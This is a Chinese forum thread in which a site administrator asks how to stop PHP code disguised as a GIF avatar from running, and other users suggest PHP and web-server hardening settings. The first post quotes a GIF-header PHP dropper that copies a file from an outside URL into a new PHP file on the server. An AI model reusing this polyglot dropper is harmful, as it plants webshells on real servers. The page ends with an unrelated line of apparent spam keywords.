如何禁止服務器上的圖片中包含的這個代碼不運行？

paladinet · 發表于 2020-3-18 20:03:19

圖片中包含的代碼如下： GIF89a<?php copy('http://www.discuz.pub/dama.txt','123asx.php');
請教，如何讓這個不運行!!!

我知道答案回答被采納將會獲得1 貢獻已有8人回答

jet · 發表于 2020-3-18 21:16:01

我的也是，

Failure · 發表于 2020-3-18 21:17:30

什么環境下？

老周部落 · 發表于 2020-3-18 21:47:38

本帖最后由老周部落于 2020-3-19 09:39 編輯

1. 請問木馬文件被上傳到哪個目錄？

2. 如果是Windows請確認以下設置如圖所示。

3. 如果使用nginx，要保證php配置中cgi.fix_pathinfo = 0。

4. 如果使用php-fpm，那么設置中的security.limit_extensions只有.php。

paladinet · 發表于 2020-3-19 11:44:29

Failure 發表于 2020-3-18 21:17
什么環境下？

IIS + php7.3

paladinet · 發表于 2020-3-19 11:46:39

老周部落發表于 2020-3-18 21:47
1. 請問木馬文件被上傳到哪個目錄？

2. 如果是Windows請確認以下設置如圖所示。

目錄： uc_server/data/avatar/下的一個目錄內

之前就是按圖設置的。

paladinet · 發表于 2020-3-19 11:46:52

jet 發表于 2020-3-18 21:16
我的也是，

你的解決了么？

老周部落 · 發表于 2020-3-19 15:34:24

paladinet 發表于 2020-3-19 11:46
目錄： uc_server/data/avatar/下的一個目錄內

之前就是按圖設置的。

您現在訪問能運行么？

lookboy · 發表于 2020-3-20 14:02:31

本帖最后由 lookboy 于 2020-3-20 14:08 編輯

前幾天我的服務器被攻擊
第一次發現病毒被偽裝成圖片格式隱藏在兩年前的圖片文件夾里

久久久久av_欧美日韩一区二区在线_国产精品三区四区_日韩中字在线